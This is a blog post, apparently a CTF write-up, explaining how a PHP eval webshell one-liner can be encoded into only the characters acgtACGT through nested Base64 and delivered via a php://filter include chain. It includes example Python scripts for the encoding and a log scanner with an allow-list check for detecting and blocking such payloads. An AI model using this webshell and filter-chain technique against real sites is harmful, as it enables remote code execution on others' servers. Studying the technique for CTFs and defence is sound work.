Clever webshell tricks

Posted by santillano at 2020-03-21

While looking at a web challenge from XDCTF some time ago, I came across a very strange way of constructing a webshell.

Base64 one-line webshell

The gist of the challenge: file inclusion is allowed, but the characters you may use are restricted. Only the eight characters acgtACGT are permitted.

Emmm, when I first saw this I thought there was no way to build a webshell out of that at all. If someone could, I would eat ice cream on a live stream.

Without further ado, the principle is as follows:

First, roughly speaking: any string made up of characters from {A-Z | a-z | 0-9 | + | /} whose length is a multiple of 4 (if it is not, it can be padded with '=') can be fed to a Base64 decoder, and the decoded output will generally contain bytes outside that character set. For example:

Base64-decode the string aaaa: the result is i followed by two garbled bytes (i�� in the screenshot). The garbage does not matter; what matters is that at least one new usable character, i, has been produced.

With a hash such as MD5, changing a single letter changes the entire output; Base64 is not like that.

Base64 encoding represents binary data using 64 printable characters. Since 2^6 = 64, every 6 bits form one unit that corresponds to one printable character. Three bytes are 24 bits, which correspond to four Base64 units, so three bytes are represented by four printable characters: three bytes encode to four bytes, and four bytes decode back to three.

Therefore Base64 has the property that it works in units of four characters: when several units are joined and decoded, the decoded pieces come out in the same order as the units were joined. Another example:

abcABC123 encodes to YWJjQUJDMTIz. Split the encoded string into groups of four, YWJj (abc), QUJD (ABC) and MTIz (123), and recombine them as MTIzYWJjQUJD. Decoding that gives:

123abcABC

The order of 123 and abcABC has been swapped.

Another property of Base64 is that the decoder silently discards characters it cannot use. If the string to be decoded contains illegal characters, meaning characters outside the set {A-Z | a-z | 0-9 | + | /} that are not the trailing '=' padding, they are simply dropped. Another example:

PS: note that the Python version is 2.7.

Decoding aaaa gives i plus two garbage bytes (aaaa → i��).

Decoding iiii gives three garbage bytes (iiii → �(�).

Repeating the decoding result of aaaa four times and decoding that gives the same result as decoding iiii, because the garbage bytes are dropped first (aaaa → iiii).
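The three properties just described (six-bit units, independent four-character groups, and junk being dropped before decoding), shown in a short Python 3 script. This is an added example written for this post, not the author's code or the script the post refers to; the helper names are mine, the strings are the ones used above, and the one input containing junk bytes is constructed for the example.

```python
import base64

# The 64 legal Base64 characters; a character's index is its 6-bit value.
B64_ALPHABET = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789+/"
)


def decode_quad(quad):
    """Decode one four-character unit by hand: 4 x 6 bits = 24 bits = 3 bytes."""
    if len(quad) != 4 or any(ch not in B64_ALPHABET for ch in quad):
        raise ValueError("expected exactly four legal Base64 characters")
    bits = 0
    for ch in quad:
        bits = (bits << 6) | B64_ALPHABET.index(ch)
    return bits.to_bytes(3, "big")


def decode_units(s):
    """Decode unit by unit. Each unit maps to its own three bytes, which is why the
    units can be re-ordered and the decoded pieces simply follow that order."""
    return b"".join(decode_quad(s[i:i + 4]) for i in range(0, len(s), 4))


def lenient_decode(data):
    """The tolerant decoding rule: drop every byte that is not a legal Base64
    character, pad to a multiple of four, then decode what is left."""
    kept = bytes(b for b in data if chr(b) in B64_ALPHABET)
    kept += b"=" * (-len(kept) % 4)
    return base64.b64decode(kept)


def reorder_example():
    """abcABC123 encodes to YWJjQUJDMTIz; moving the last unit to the front moves 123."""
    units = ["YWJj", "QUJD", "MTIz"]             # abc, ABC, 123
    swapped = units[2] + units[0] + units[1]     # MTIzYWJjQUJD
    return decode_units(swapped).decode()        # '123abcABC'


def junk_is_dropped():
    """aaaa decodes to i plus two junk bytes; four copies of that decode exactly like
    iiii, because the junk is discarded before decoding."""
    one = decode_quad("aaaa")                    # b'i\xa6\x9a'
    return lenient_decode(one * 4) == base64.b64decode("iiii")


if __name__ == "__main__":
    print(decode_quad("aaaa"))                   # b'i\xa6\x9a'
    print(reorder_example())                     # 123abcABC
    print(junk_is_dropped())                     # True
```

Python 3's own base64.b64decode applies the same drop-the-junk rule by default (validate=False); lenient_decode spells the rule out so it is visible, and it also restores missing '=' padding, which b64decode alone would reject.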

So what tricks do these two examples give us?

Three pieces of background knowledge:

① Encoding and decoding are not a one-to-one correspondence: the letter a, say, can be produced by Base64-decoding several different combinations of other characters (there are far more four-character combinations than there are legal Base64 characters).

② Decoding works in units of four characters, and when several units are joined and decoded the result keeps the order in which they were joined.

③ Our one-liner <?php @eval($_POST[a]);?> can be obtained by decoding some other string. Call the one-liner string number one and the string that decodes to it string number two; this chain is not unique, so it is possible to find a string made up of only the eight characters acgtACGT which, after n rounds of decoding, turns into our one-line webshell. Throughout this process we must work in groups of four, otherwise the order gets scrambled.

Next comes Wang Yihang's Python script, to which I added a lot of comments. Let's analyse it step by step, starting from the main function:

First, base64_chars, defined earlier as

base64_chars = string.letters + string.digits + "+/"

is every character that may appear in a Base64 string other than '='. Then

tables = enmu_tables(set(chars))

passes the eight usable characters into the enmu_tables() function.

Following enmu_tables(): it takes the eight characters we may use, forms them into groups of four, Base64-decodes each group and builds a dictionary. Its keys are the legal Base64 characters that the acgtACGT combinations can produce (each accompanied by two illegal bytes destined to be thrown away), and its values are the four-character acgtACGT combinations that produce them.

Remember the example from earlier? Decoding aaaa produces i, so the first entry generated has key i and value 'aaaa' (aaaa → i��).

After going through all the combinations, we have 26 characters, and the number of four-character strings these 26 characters can form is 26^4.

Running the same step again, we get 57.

Loop once more: we have 64, the complete set of legal Base64 characters.

At this point we hold three tables, each mapping one key character (plus two junk bytes that will be discarded) to a four-character value. Now we split the one-line webshell into single characters and look each one up in the last table (64 keys) to get a four-character string made of the 57 characters from the second round. Then we take each of those characters to the second table and replace it with a four-character combination of the 26 characters from the first round. Finally we go to the first table and replace each of those with a four-character string over the original eight characters.
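The table construction and the three rounds of growth described above, reproduced on benign text in Python 3. This is an added example written for this post, not Wang Yihang's script or the author's code; function names are mine. It builds the same table as enmu_tables (a legal character mapped to a four-character group whose decode is that character plus two junk bytes, read here as "exactly one legal byte and no '='"), but finds the entries by searching around the middle pair of characters instead of trying all combinations, which makes the 57-character round cheap. The round trip uses the constructed text "hello world" rather than a webshell, and restores the '=' padding that the encoder drops.

```python
import base64
import itertools
import string

# Legal Base64 characters in value order (the page's base64_chars, ordered so that a
# character's index is its 6-bit value); Python 3 has no string.letters.
B64_CHARS = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
VAL = {ch: i for i, ch in enumerate(B64_CHARS)}
LEGAL = frozenset(B64_CHARS)
START = "acgtACGT"   # the challenge's allowed characters


def is_junk(byte):
    """A decoded byte is junk when a later decode will silently drop it: not a legal
    Base64 character and not '=', which would end the decode early instead."""
    return chr(byte) not in LEGAL and byte != ord("=")


def build_table(chars):
    """Map each reachable legal character to one 4-character quad over `chars` whose
    decode is that character plus two junk bytes. Same table as enmu_tables, but
    searched around the middle pair (q1, q2): byte 0 depends on (q0, q1), byte 1 on
    (q1, q2) and byte 2 on (q2, q3), so the two outer bytes are chosen independently."""
    chars = sorted(set(chars))
    table = {}
    for q1, q2 in itertools.product(chars, repeat=2):
        mid = (VAL[q1] & 0xF) << 4 | VAL[q2] >> 2
        first = {q0: VAL[q0] << 2 | VAL[q1] >> 4 for q0 in chars}
        last = {q3: (VAL[q2] & 3) << 6 | VAL[q3] for q3 in chars}
        junk_first = [q0 for q0, b in first.items() if is_junk(b)]
        junk_last = [q3 for q3, b in last.items() if is_junk(b)]
        if not is_junk(mid):                      # key sits in the middle byte
            if chr(mid) in LEGAL and junk_first and junk_last:
                table.setdefault(chr(mid), junk_first[0] + q1 + q2 + junk_last[0])
            continue
        for q0, b in first.items():               # key sits in the first byte
            if chr(b) in LEGAL and junk_last:
                table.setdefault(chr(b), q0 + q1 + q2 + junk_last[0])
        for q3, b in last.items():                # key sits in the last byte
            if chr(b) in LEGAL and junk_first:
                table.setdefault(chr(b), junk_first[0] + q1 + q2 + q3)
    return table


def expand(chars=START):
    """Build tables round by round until all 64 legal characters are reachable.
    Returns the tables in build order: the first one maps onto `chars` itself."""
    tables, current = [], set(chars)
    while current != LEGAL:
        table = build_table(current)
        if len(table) <= len(current):
            raise RuntimeError("alphabet stopped growing at %d characters" % len(current))
        tables.append(table)
        current = set(table)
    return tables


def round_sizes(chars=START):
    """How many legal characters each round reaches; acgtACGT gives [26, 57, 64]."""
    return [len(t) for t in expand(chars)]


def table_is_consistent(table):
    """Check a table the way a decoder will see it: each quad must decode to exactly
    its key as the only legal byte, with no '=' among the junk."""
    for ch, quad in table.items():
        decoded = base64.b64decode(quad)
        if [chr(b) for b in decoded if chr(b) in LEGAL] != [ch] or b"=" in decoded:
            return False
    return True


def encode_layers(text, tables):
    """Rewrite base64(text) through the tables, last table first, so the result uses
    only the starting alphabet. Trailing '=' is dropped and restored when decoding."""
    layer = base64.b64encode(text.encode()).decode().rstrip("=")
    for table in reversed(tables):
        layer = "".join(table[ch] for ch in layer)
    return layer


def decode_layers(data, rounds):
    """A lenient decoder applied `rounds` times: drop junk, restore padding, decode."""
    if isinstance(data, str):
        data = data.encode()
    for _ in range(rounds):
        kept = bytes(b for b in data if chr(b) in LEGAL)
        data = base64.b64decode(kept + b"=" * (-len(kept) % 4))
    return data.decode()


def roundtrip(text="hello world", chars=START):
    """Encode benign text into the restricted alphabet and decode it back.
    Returns (decoded text, whether the encoded form stayed inside `chars`)."""
    tables = expand(chars)
    encoded = encode_layers(text, tables)
    return decode_layers(encoded, len(tables) + 1), set(encoded) <= set(chars)


if __name__ == "__main__":
    print(round_sizes())    # [26, 57, 64]
    print(roundtrip())      # ('hello world', True)
```

The number of decode rounds is one more than the number of tables, because the innermost layer is the plain Base64 encoding of the text. Each table entry is checked by table_is_consistent, which is the property the whole chain depends on: if a junk byte were itself a legal character, the next decode would keep it and the groups of four would fall out of alignment.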

The replacement was done three times in total, and because the one-liner was Base64-encoded before being fed in, the final payload is:

include(php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=[our acgtACGT combination])

The generated payload, saved in a file named acgtACGT, looks like this: it is very long, so I will not paste it.

One more thing to note about that script: if the length is not a multiple of 4, '=' is appended by default, following the Base64 padding rule, to bring it up to a multiple of 4.
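The payload shape above is what a defender would want to recognise in request logs. The following is an added example written for this post, not part of the original: it scans constructed access-log lines (made up here, not from any real server) for php://filter wrappers in query parameters, rates a chain of several convert.base64-decode filters highest, and shows the allow-list check that keeps such a value from ever reaching include(). The function and parameter names and the allow-list contents are my own.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines for this example: method, request target, protocol, status.
_DECODE_SEGMENT = "php%3A%2F%2Ffilter%2Fconvert.base64-decode%2Fresource%3D"
SAMPLE_LOG = "\n".join([
    "GET /index.php?page=about HTTP/1.1 200",
    "GET /index.php?page=" + _DECODE_SEGMENT * 4 + "acgtACGT HTTP/1.1 200",
    "GET /index.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dconfig.php HTTP/1.1 200",
    "GET /index.php?page=contact HTTP/1.1 200",
])

FILTER_WRAPPER = re.compile(r"php://filter/", re.IGNORECASE)
B64_DECODE = re.compile(r"convert\.base64-decode", re.IGNORECASE)


def inspect_value(value):
    """Count php://filter wrappers and convert.base64-decode filters in one parameter
    value. The value is percent-decoded once more in case it was double-encoded."""
    decoded = unquote(value)
    return len(FILTER_WRAPPER.findall(decoded)), len(B64_DECODE.findall(decoded))


def scan_log(text):
    """Flag requests whose query parameters carry a php://filter wrapper. A chain of
    two or more base64-decode filters has the shape of the payload above and is rated
    high; any wrapper at all in a request parameter is rated medium."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        query = urlsplit(fields[1]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            wrappers, decodes = inspect_value(value)
            if wrappers == 0:
                continue
            findings.append({
                "param": name,
                "wrappers": wrappers,
                "base64_decodes": decodes,
                "severity": "high" if decodes >= 2 else "medium",
                "request": fields[1][:60],
            })
    return findings


ALLOWED_PAGES = frozenset({"home", "about", "contact"})   # constructed allow-list


def is_safe_include(value, allowed=ALLOWED_PAGES):
    """The fix on the application side: map the request parameter onto a fixed
    allow-list of page names and include nothing else. Wrappers, paths and encodings
    never reach include() because they are not in the list."""
    return value in allowed


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(is_safe_include("about"), is_safe_include("php://filter/resource=x"))
```

Matching on the decoded parameter value matters: the wrapper arrives percent-encoded, so a rule that looks for the literal php://filter in the raw request line sees nothing. Character restrictions on the included name are no substitute for the allow-list, since this post shows eight characters are enough to carry an arbitrary payload through nested decodes.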


There are also some clever webshell ideas from master P, which I will write up later. You can also follow the original author's blog.
